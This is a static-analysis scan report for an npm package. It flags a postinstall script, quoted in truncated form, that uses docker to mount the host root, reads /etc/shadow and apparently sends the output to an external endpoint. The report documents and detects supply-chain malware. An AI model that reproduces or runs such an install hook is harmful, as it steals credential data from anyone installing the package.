Static Scan Results
scanned 4h ago · by rust-scannerStatic analysis flagged 5 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
High-risk behavior combination matched malicious policy.
Decision evidence
public snapshotBehavioral surface
NoLicense
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkg•scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgpackage.json#scripts.postinstallView file
1"const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').toString(...
Critical
Command Output Exfiltration
Source executes local commands and sends command output to an external endpoint.
package.json#scripts.postinstallView on unpkg · L1Findings
2 Critical1 High2 Low
CriticalRed Install Lifecycle Scriptpackage.json
CriticalCommand Output Exfiltrationpackage.json#scripts.postinstall
HighInstall Time Lifecycle Scriptspackage.json
LowScripts Present
LowNo License